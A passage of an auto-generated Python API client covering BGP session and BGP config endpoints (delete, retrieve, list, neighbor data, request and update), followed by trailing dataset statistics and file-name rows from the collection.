>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_bgp_session" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_bgp_session`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/bgp/sessions/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_bgp_config_by_project(self, id, **kwargs): # noqa: E501
"""Retrieve a bgp config # noqa: E501
Returns a bgp config # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_config_by_project(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to included deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpConfig
"""
kwargs['_return_http_data_only'] = True
return self.find_bgp_config_by_project_with_http_info(id, **kwargs) # noqa: E501
def find_bgp_config_by_project_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve a bgp config # noqa: E501
Returns a bgp config # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_config_by_project_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to included deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpConfig, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'include',
'exclude'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_bgp_config_by_project" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_bgp_config_by_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'include' in local_var_params and local_var_params['include'] is not None: # noqa: E501
query_params.append(('include', local_var_params['include'])) # noqa: E501
collection_formats['include'] = 'csv' # noqa: E501
if 'exclude' in local_var_params and local_var_params['exclude'] is not None: # noqa: E501
query_params.append(('exclude', local_var_params['exclude'])) # noqa: E501
collection_formats['exclude'] = 'csv' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpConfig",
401: "Error",
403: "Error",
404: "Error",
}
return self.api_client.call_api(
'/projects/{id}/bgp-config', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_bgp_session_by_id(self, id, **kwargs): # noqa: E501
"""Retrieve a BGP session # noqa: E501
Returns a BGP session # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_session_by_id(id, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to included deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSession
"""
kwargs['_return_http_data_only'] = True
return self.find_bgp_session_by_id_with_http_info(id, **kwargs) # noqa: E501
def find_bgp_session_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve a BGP session # noqa: E501
Returns a BGP session # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_session_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param include: Nested attributes to include. Included objects will return their full attributes. Attribute names can be dotted (up to 3 levels) to included deeply nested objects.
:type include: list[str]
:param exclude: Nested attributes to exclude. Excluded objects will return only the href attribute. Attribute names can be dotted (up to 3 levels) to exclude deeply nested objects.
:type exclude: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSession, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'include',
'exclude'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_bgp_session_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_bgp_session_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'include' in local_var_params and local_var_params['include'] is not None: # noqa: E501
query_params.append(('include', local_var_params['include'])) # noqa: E501
collection_formats['include'] = 'csv' # noqa: E501
if 'exclude' in local_var_params and local_var_params['exclude'] is not None: # noqa: E501
query_params.append(('exclude', local_var_params['exclude'])) # noqa: E501
collection_formats['exclude'] = 'csv' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSession",
401: "Error",
403: "Error",
404: "Error",
}
return self.api_client.call_api(
'/bgp/sessions/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_bgp_sessions(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions # noqa: E501
Provides a listing of available BGP sessions for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_sessions(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSessionList
"""
kwargs['_return_http_data_only'] = True
return self.find_bgp_sessions_with_http_info(id, **kwargs) # noqa: E501
def find_bgp_sessions_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions # noqa: E501
Provides a listing of available BGP sessions for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_bgp_sessions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSessionList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_bgp_sessions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_bgp_sessions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSessionList",
401: "Error",
403: "Error",
}
return self.api_client.call_api(
'/devices/{id}/bgp/sessions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_project_bgp_sessions(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions for project # noqa: E501
Provides a listing of available BGP sessions for the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_project_bgp_sessions(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSessionList
"""
kwargs['_return_http_data_only'] = True
return self.find_project_bgp_sessions_with_http_info(id, **kwargs) # noqa: E501
def find_project_bgp_sessions_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve all BGP sessions for project # noqa: E501
Provides a listing of available BGP sessions for the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_project_bgp_sessions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSessionList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_project_bgp_sessions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_project_bgp_sessions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSessionList",
401: "Error",
404: "Error",
}
return self.api_client.call_api(
'/projects/{id}/bgp/sessions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_bgp_neighbor_data(self, id, **kwargs): # noqa: E501
"""Retrieve BGP neighbor data for this device # noqa: E501
Provides a summary of the BGP neighbor data associated to the BGP sessions for this device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bgp_neighbor_data(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSessionNeighbors
"""
kwargs['_return_http_data_only'] = True
return self.get_bgp_neighbor_data_with_http_info(id, **kwargs) # noqa: E501
def get_bgp_neighbor_data_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve BGP neighbor data for this device # noqa: E501
Provides a summary of the BGP neighbor data associated to the BGP sessions for this device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bgp_neighbor_data_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSessionNeighbors, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bgp_neighbor_data" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_bgp_neighbor_data`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "BgpSessionNeighbors",
401: "Error",
403: "Error",
404: "Error",
}
return self.api_client.call_api(
'/devices/{id}/bgp/neighbors', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def request_bgp_config(self, id, bgp_config_request, **kwargs): # noqa: E501
"""Requesting bgp config # noqa: E501
Requests to enable bgp configuration for a project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_bgp_config(id, bgp_config_request, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param bgp_config_request: BGP config Request to create (required)
:type bgp_config_request: BgpConfigRequestInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.request_bgp_config_with_http_info(id, bgp_config_request, **kwargs) # noqa: E501
def request_bgp_config_with_http_info(self, id, bgp_config_request, **kwargs): # noqa: E501
"""Requesting bgp config # noqa: E501
Requests to enable bgp configuration for a project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_bgp_config_with_http_info(id, bgp_config_request, async_req=True)
>>> result = thread.get()
:param id: Project UUID (required)
:type id: str
:param bgp_config_request: BGP config Request to create (required)
:type bgp_config_request: BgpConfigRequestInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'bgp_config_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method request_bgp_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `request_bgp_config`") # noqa: E501
# verify the required parameter 'bgp_config_request' is set
if self.api_client.client_side_validation and ('bgp_config_request' not in local_var_params or # noqa: E501
local_var_params['bgp_config_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `bgp_config_request` when calling `request_bgp_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'bgp_config_request' in local_var_params:
body_params = local_var_params['bgp_config_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/projects/{id}/bgp-configs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def update_bgp_session(self, id, default_route, **kwargs): # noqa: E501
"""Update the BGP session # noqa: E501
Updates the BGP session by either enabling or disabling the default route functionality. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bgp_session(id, default_route, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param default_route: Default route (required)
:type default_route: bool
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.update_bgp_session_with_http_info(id, default_route, **kwargs) # noqa: E501
def update_bgp_session_with_http_info(self, id, default_route, **kwargs): # noqa: E501
"""Update the BGP session # noqa: E501
Updates the BGP session by either enabling or disabling the default route functionality. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bgp_session_with_http_info(id, default_route, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param default_route: Default route (required)
:type default_route: bool
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'default_route'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_bgp_session" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_bgp_session`") # noqa: E501
# verify the required parameter 'default_route' is set
if self.api_client.client_side_validation and ('default_route' not in local_var_params or # noqa: E501
local_var_params['default_route'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `default_route` when calling `update_bgp_session`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'default_route' in local_var_params:
body_params = local_var_params['default_route']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/bgp/sessions/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 44.380313
| 312
| 0.59171
| 6,719
| 59,514
| 4.993303
| 0.039887
| 0.037914
| 0.058838
| 0.028972
| 0.966438
| 0.960805
| 0.956274
| 0.94918
| 0.94152
| 0.935261
| 0
| 0.014347
| 0.337097
| 59,514
| 1,340
| 313
| 44.413433
| 0.836054
| 0.483785
| 0
| 0.762626
| 0
| 0
| 0.168898
| 0.03571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031987
| false
| 0
| 0.008418
| 0
| 0.072391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18a2a05748a7d49b475f56fc1588e7ce544d68d6
| 7,736
|
py
|
Python
|
1_SVG_converter_Plus.py
|
hirowgit/2B0_python_optmization_course
|
e1890a41d0daf9a44a4d1e0a6c5d775f8ab7691b
|
[
"MIT"
] | null | null | null |
1_SVG_converter_Plus.py
|
hirowgit/2B0_python_optmization_course
|
e1890a41d0daf9a44a4d1e0a6c5d775f8ab7691b
|
[
"MIT"
] | null | null | null |
1_SVG_converter_Plus.py
|
hirowgit/2B0_python_optmization_course
|
